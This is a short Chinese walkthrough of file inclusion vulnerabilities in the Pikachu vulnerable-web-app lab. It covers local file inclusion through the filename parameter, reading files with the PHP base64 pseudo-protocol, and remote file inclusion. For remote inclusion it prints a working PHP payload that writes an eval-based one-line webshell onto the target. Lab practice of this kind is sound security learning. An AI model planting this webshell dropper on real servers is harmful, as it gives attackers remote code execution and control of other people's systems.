File Inclusion(文件包含漏洞)
本地文件包含
url:
192.168.171.30/pikachu/vul/fileinclude/fi_local.php?filename=file1.php&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2
可以看到文件名是通过参数传递给后端的,这样修改文件名,就可以查看服务器的任意文件的内容了,这就是本地文件包含。
远程文件包含
首先可以用php伪协议base64编码读取文件:
还可以在远程服务器上网站目录上创建以下内容文件,往靶机写入一句话木马。
注意后缀名不能设置成.php,不然会被远程服务器解析php代码,而不是靶机解析。
<?PHP fputs(fopen('shell.php','w'),'<?php @eval($_POST[shell])?>');?>
然后用靶机网站文件包含打开服务器的文件,写入一句话木马就成功了。
进入靶机查看,发现一句话webshell已经被写入,远程文件包含写入webshell成功。
如何利用一句话木马请看后面的pikachu文件上传。